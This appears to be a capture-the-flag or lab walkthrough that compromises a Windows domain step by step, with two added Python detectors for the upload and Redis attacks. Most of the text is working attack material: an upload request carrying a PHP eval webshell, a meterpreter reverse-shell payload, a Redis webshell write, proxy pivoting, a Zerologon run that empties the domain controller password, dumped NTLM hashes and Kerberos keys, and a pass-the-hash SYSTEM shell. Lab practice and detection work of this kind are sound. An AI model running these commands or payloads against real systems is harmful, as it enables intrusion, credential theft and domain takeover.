Win7 access
Getting a shell through the arbitrary file upload
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"

submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"

R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--
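As an added, defender-side example that is not part of the original post: a small Python check that parses a multipart upload body and flags what makes the request above work, namely client-supplied CONFIG[...] fields (the upload policy must never come from the client), an allow-list entry or filename with an executable extension, and a PHP tag inside the file part. The boundary and filenames in the sample are constructed.

```python
import re

# Extensions a web-root upload endpoint must never accept (enforced server-side, never from the client).
EXEC_EXTS = {".php", ".php5", ".phtml", ".phar", ".jsp", ".jspx", ".asp", ".aspx"}
SCRIPT_TAG = re.compile(r"<\?php|<\?=|\beval\s*\(", re.I)

def parse_multipart(body: str, boundary: str):
    """Split a multipart/form-data body into (name, filename, content) tuples.
    Deliberately minimal: enough for WAF/log review, not a full RFC 7578 parser."""
    parts = []
    for raw in body.split("--" + boundary):
        raw = raw.strip("\r\n")
        if not raw or raw == "--":          # leading empty chunk / closing "--"
            continue
        head, _, content = raw.partition("\r\n\r\n")
        name = re.search(r'(?<!file)name="([^"]*)"', head)   # skip the 'name=' inside 'filename='
        fname = re.search(r'filename="([^"]*)"', head)
        parts.append((name.group(1) if name else "",
                      fname.group(1) if fname else None, content))
    return parts

def audit_upload(body: str, boundary: str):
    """Return human-readable findings for one UEditor-style upload request."""
    findings = []
    for name, fname, content in parse_multipart(body, boundary):
        if name.startswith("CONFIG["):
            # Upload policy arriving from the client is the root cause of this upload bug.
            findings.append(f"client-supplied server config: {name}={content!r}")
        if name == "CONFIG[fileAllowFiles][]" and content.strip().lower() in EXEC_EXTS:
            findings.append(f"allow-list widened to executable extension: {content}")
        if fname is not None:
            ext = ("." + fname.rsplit(".", 1)[-1].lower()) if "." in fname else ""
            if ext in EXEC_EXTS:
                findings.append(f"executable upload filename: {fname}")
            if SCRIPT_TAG.search(content):
                findings.append(f"script content inside uploaded file: {fname}")
    return findings

# Constructed sample mirroring the request above (boundary and filename are made up).
BOUNDARY = "----WebKitFormBoundaryEXAMPLE"
MALICIOUS = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"\r\n\r\n.php\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="filename"; filename="shell.php"\r\n\r\n'
    "<?php echo 'test'; ?>\r\n"
    f"--{BOUNDARY}--\r\n"
)
```

Running `audit_upload(MALICIOUS, BOUNDARY)` yields four findings; a JPEG upload without CONFIG fields yields none.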
Of course, simply throwing a tool at it also works.
Win2016 access
Bring Win7 online in CS (Cobalt Strike) as a fallback
Generating the CS payload
Set up a listener
Generate an exe payload
Upload it with AntSword and run it; the host then checks in.
Getting a shell via unauthenticated Redis
Getting a session in MSF
Generate a reverse payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe
Upload and execute it through AntSword, with msf listening
┌──(root㉿kali)-[~]
└─# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800
meterpreter > ls
Listing: C:\tmp
===============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2024-10-23 20:06:58 +0800  555.exe

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >
Add a route, set up the proxy, and use arp to find the IPs on the internal segment
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION  1                yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

View the full module info with the info, or info -d command.

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)

   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > arp a

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    10.0.20.1        00:50:56:c0:00:0b  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.99       00:0c:29:49:db:32  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.254      00:50:56:f2:92:e5  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.255      ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2
    192.168.159.1    00:50:56:c0:00:08  Intel(R) PRO/1000 MT Network Connection
    192.168.159.2    00:50:56:f4:36:2d  Intel(R) PRO/1000 MT Network Connection
    192.168.159.128  00:0c:29:cc:f9:72  Intel(R) PRO/1000 MT Network Connection
    192.168.159.254  00:50:56:fe:c6:0b  Intel(R) PRO/1000 MT Network Connection
    192.168.159.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection
    224.0.0.22       00:00:00:00:00:00  Software Loopback Interface 1
    224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection
    224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection #2
    224.0.0.22       01:00:5e:00:00:16  Bluetooth 设备(个人区域网)
    224.0.0.252      00:00:00:00:00:00  Software Loopback Interface 1
    224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection
    224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection #2
    239.255.255.250  00:00:00:00:00:00  Software Loopback Interface 1
    239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection
    239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection #2
    255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection
    255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2
    255.255.255.255  ff:ff:ff:ff:ff:ff  Bluetooth 设备(个人区域网)
Edit the proxychains configuration
vi /etc/proxychains4.conf
Once proxied, the unauthenticated Redis instance can be reached directly.
Using the unauthenticated Redis together with the PHP web environment to get a shell
Writing a webshell through the unauthenticated Redis
┌──(root㉿kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
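An added detection example, not from the original post: it walks Redis MONITOR output (or a command log in the same format) and alerts when a single client retargets the RDB file to a script name, stores a script tag and then SAVEs, which is the sequence shown above. The sample lines are constructed to mirror that session; timestamps and client ports are made up.

```python
import re
import shlex

# Extensions that make a dumped RDB file executable once it lands under a web root.
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".aspx", ".sh")
# Redis MONITOR line: <unix ts> [<db> <client ip:port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>.*)$')

def parse_monitor_line(line):
    """Return (client, argv) for one MONITOR line, or None if it does not parse."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), shlex.split(m.group("argv"))   # MONITOR quotes every argument

def detect_webshell_write(lines):
    """Flag clients that point the RDB file at a script name, store a script tag and SAVE."""
    state, alerts = {}, []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, argv = parsed
        st = state.setdefault(client, {"dir": None, "dbfilename": None, "payload": False})
        cmd = argv[0].upper()
        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            key, val = argv[2].lower(), argv[3]
            if key == "dir":
                st["dir"] = val
            elif key == "dbfilename" and val.lower().endswith(SCRIPT_EXTS):
                st["dbfilename"] = val
        elif cmd in ("SET", "MSET", "LPUSH", "RPUSH", "HSET", "APPEND"):
            if any("<?php" in a.lower() or "<%" in a for a in argv[1:]):
                st["payload"] = True
        elif cmd in ("SAVE", "BGSAVE") and st["dbfilename"] and (st["dir"] or st["payload"]):
            alerts.append(f"{client}: RDB dumped as {st['dbfilename']} in {st['dir']}, "
                          f"script payload={st['payload']}")
    return alerts

# Constructed MONITOR excerpt mirroring the session above.
SAMPLE_MONITOR = [
    '1741500000.100000 [0 10.0.20.1:50110] "CONFIG" "SET" "dir" "C:/phpStudy/PHPTutorial/WWW/"',
    '1741500000.200000 [0 10.0.20.1:50110] "CONFIG" "SET" "dbfilename" "tx.php"',
    '1741500000.300000 [0 10.0.20.1:50110] "SET" "1" "<?php echo 1; ?>"',
    '1741500000.400000 [0 10.0.20.1:50110] "SAVE"',
    '1741500001.000000 [0 10.0.20.5:40001] "SET" "session:42" "ok"',   # ordinary client, no alert
    '1741500001.100000 [0 10.0.20.5:40001] "SAVE"',
]
```

The same instance would not have been writable this way with `bind 127.0.0.1`, `protected-mode yes`, a `requirepass`, and CONFIG disabled via `rename-command CONFIG ""`, all standard redis.conf directives.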
After writing the shell, configure a proxy in AntSword and connect.
Bringing it online in CS
Right-click Win7 and choose the pivot listener option.
Generate the payload as shown in the figure
Once configured, a listener is created and started automatically.
Getting access to Win2019
MSF forward (bind) connection through the proxy
Start msf through the proxy; note that only when it runs through the proxy (proxychains msfconsole) can its traffic reach the internal Win2016 host.
┌──(root㉿kali)-[/zbug]
└─# proxychains msfconsole
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result
of hosts and services
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf6 > use exploit/multi/handler
[proxychains] DLL init: proxychains-ng 4.17
[*] Using configured payload generic/shell_reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > set lport 4444
[proxychains] DLL init: proxychains-ng 4.17
lport => 4444
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > set rhost 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
rhost => 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 ... OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
[proxychains] DLL init: proxychains-ng 4.17
meterpreter >
Run the payload through AntSword.
Add the route chain
meterpreter > run post/multi/manage/autoroute
[proxychains] DLL init: proxychains-ng 4.17
[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > run post/windows/gather/enum_domain
[proxychains] DLL init: proxychains-ng 4.17
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > bg
[proxychains] DLL init: proxychains-ng 4.17
[*] Backgrounding session 1...
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > set version 5
[proxychains] DLL init: proxychains-ng 4.17
version => 5
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > set srvport 1081
[proxychains] DLL init: proxychains-ng 4.17
srvport => 1081
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > options
[proxychains] DLL init: proxychains-ng 4.17

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1081             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)

   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

View the full module info with the info, or info -d command.

[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Auxiliary module running as background job 0.
[proxychains] DLL init: proxychains-ng 4.17
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >
After this is configured, edit the proxychains configuration file again to add the second hop.
vi /etc/proxychains4.conf
Use nmap to test whether the chain works
┌──(root㉿kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:139 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).

PORT     STATE  SERVICE
80/tcp   closed http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 45.37 seconds
Exploiting CVE-2020-1472
git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .
After the download completes, use the CVE-2020-1472 vulnerability to reset the domain controller's machine account password to an empty string.
┌──(root㉿kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49670 ... OK
=========================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
Use secretsdump.py to try to obtain the Administrator hash from the domain controller; the script is in the impacket/examples directory.
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:9173b992970cde4cf92795ea2f57c82fc72752e261eb3f6db7fd385500da709a
WIN2016$:aes128-cts-hmac-sha1-96:2fdb26ae937ab6b24e0931ac928ab960
WIN2016$:des-cbc-md5:8cce51314fb95761
[*] Cleaning up...
Successfully obtained:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
In the same directory, use smbexec.py to get a shell on the domain controller.
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system